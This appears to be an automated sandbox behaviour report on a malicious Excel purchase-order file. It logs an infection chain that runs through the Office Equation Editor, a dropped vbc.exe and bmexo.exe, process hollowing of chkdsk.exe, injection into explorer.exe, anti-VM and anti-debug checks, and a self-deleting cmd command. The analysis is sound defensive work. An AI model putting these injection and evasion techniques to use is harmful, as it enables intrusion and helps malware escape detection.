          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FFFC NtCreateProcessEx,8_2_0238FFFC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FC30 NtOpenProcess,8_2_0238FC30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FC48 NtSetInformationFile,8_2_0238FC48
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02390C40 NtGetContextThread,8_2_02390C40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FC90 NtUnmapViewOfSection,8_2_0238FC90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FD5C NtEnumerateKey,8_2_0238FD5C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02391D80 NtSuspendThread,8_2_02391D80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA310 NtCreateFile,8_2_000AA310
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA3C0 NtReadFile,8_2_000AA3C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA440 NtClose,8_2_000AA440
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA4F0 NtAllocateVirtualMemory,8_2_000AA4F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA30A NtCreateFile,8_2_000AA30A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA43A NtClose,8_2_000AA43A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AA4EA NtAllocateVirtualMemory,8_2_000AA4EA
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsxVirustotal: Detection: 38%
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsxReversingLabs: Detection: 26%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfyaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfyaJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$BON DE COMMANDE POUR CHENOUFI AEK.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6595.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/16@0/1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,4_2_004021AA
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404ABB
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\wxiwy\cojnmd\dyrz\70c437f178a447d5b5e03abf78ad86d5\khqwan\zzevlnko\Release\zzevlnko.pdb source: vbc.exe, 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp, bmexo.exe, 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000005.00000000.968231879.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000006.00000000.974589862.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, chkdsk.exe, 00000008.00000002.1174039918.0000000002887000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173217045.00000000003B3000.00000004.00000020.00020000.00000000.sdmp, nsmD99.tmp.4.dr, bmexo.exe.4.dr
          Source: Binary string: chkdsk.pdb source: bmexo.exe, 00000006.00000002.1050114953.0000000000030000.00000040.10000000.00040000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050401037.0000000000714000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: bmexo.exe, bmexo.exe, 00000006.00000003.981359909.0000000000800000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000003.979000602.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1051582479.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000008.00000002.1173724762.0000000002500000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1050200391.0000000002090000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1051411235.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D01A4 push 28D37A0Fh; iretd 2_2_035D01B1
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D0126 push 28D37A0Fh; iretd 2_2_035D01B1
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F22445 push ecx; ret 5_2_00F22458
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_004172EC push DC386EC8h; ret 6_2_00417309
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040FCF7 push ebp; ret 6_2_0040FCF8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D662 push eax; ret 6_2_0041D668
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D66B push eax; ret 6_2_0041D6D2
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D615 push eax; ret 6_2_0041D668
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D6CC push eax; ret 6_2_0041D6D2
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F22445 push ecx; ret 6_2_00F22458
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239DFA1 push ecx; ret 8_2_0239DFB4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000A72EC push DC386EC8h; ret 8_2_000A7309
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD615 push eax; ret 8_2_000AD668
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD66B push eax; ret 8_2_000AD6D2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD662 push eax; ret 8_2_000AD668
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD6CC push eax; ret 8_2_000AD6D2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009FCF7 push ebp; ret 8_2_0009FCF8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\bmexo.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D050B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F21890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00F21890
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_5-7746
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeRDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000098C04 second address: 0000000000098C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000098F9E second address: 0000000000098FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1320Thread sleep time: -480000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-6885
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00408ED0 rdtsc 6_2_00408ED0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405D7A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,4_2_004069A4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-627
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-683
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-665
          Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-3510
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeAPI call chain: ExitProcess graph end nodegraph_5-6886
          Source: explorer.exe, 00000007.00000000.1002012184.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000e
          Source: explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.987724559.00000000002AF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.1034386831.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.989955788.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1041586211.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1002012184.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F27A95 IsDebuggerPresent,5_2_00F27A95
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00F2558A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F286ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_00F286ED
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00408ED0 rdtsc 6_2_00408ED0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D0591 mov edx, dword ptr fs:[00000030h]2_2_035D0591
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_001603F8 mov eax, dword ptr fs:[00000030h]5_2_001603F8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_0016061D mov eax, dword ptr fs:[00000030h]5_2_0016061D
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_001606F7 mov eax, dword ptr fs:[00000030h]5_2_001606F7
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00160736 mov eax, dword ptr fs:[00000030h]5_2_00160736
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00160772 mov eax, dword ptr fs:[00000030h]5_2_00160772
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B26F8 mov eax, dword ptr fs:[00000030h]6_2_009B26F8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02380080 mov ecx, dword ptr fs:[00000030h]8_2_02380080
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023800EA mov eax, dword ptr fs:[00000030h]8_2_023800EA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A26F8 mov eax, dword ptr fs:[00000030h]8_2_023A26F8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040A140 LdrLoadDll,6_2_0040A140
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00F243CC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2439B SetUnhandledExceptionFilter,5_2_00F2439B
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00F243CC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F2439B SetUnhandledExceptionFilter,6_2_00F2439B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 80000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeMemory written: C:\Users\user\AppData\Local\Temp\bmexo.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfyaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeProcess created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfyaJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"Jump to behavior
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.997360427.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1009986112.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.997360427.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1009986112.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F23283 cpuid 5_2_00F23283
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
